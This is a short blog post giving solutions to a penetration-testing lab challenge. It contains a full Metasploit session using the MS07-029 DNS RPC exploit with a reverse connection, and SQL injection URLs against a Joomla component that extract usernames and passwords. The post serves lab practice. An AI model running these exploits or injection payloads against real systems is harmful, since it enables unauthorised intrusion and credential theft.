Tuesday, November 23, 2010

PenTest Challenge (131.107.1.250)

Solutions

1. MS-DNS RPC Vulnerability (MS07-029)

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
RHOST => 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
LHOST => 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
LPORT => 443
msf exploit(ms07_029_msdns_zonename) > set TARGET 0
TARGET => 0
msf exploit(ms07_029_msdns_zonename) > exploit

2. SQL Injection Vulnerability in Joomla Component (Amblog)

Link: http://www.exploit-db.com/exploits/14596/

http://131.107.1.250/joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version

http://131.107.1.250/joomla/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
Posted by at

1 comment:

  1. Saad AmirDecember 27, 2011 at 6:38 AM

    The challenge for every student has been very beneficial for him because it develop he confidence and sharpen his mind.This type of activities make the mind of the student very sharp.
    Thanks.....
    regards, saad from
    Education

    ReplyDelete

Subscribe to: Post Comments (Atom)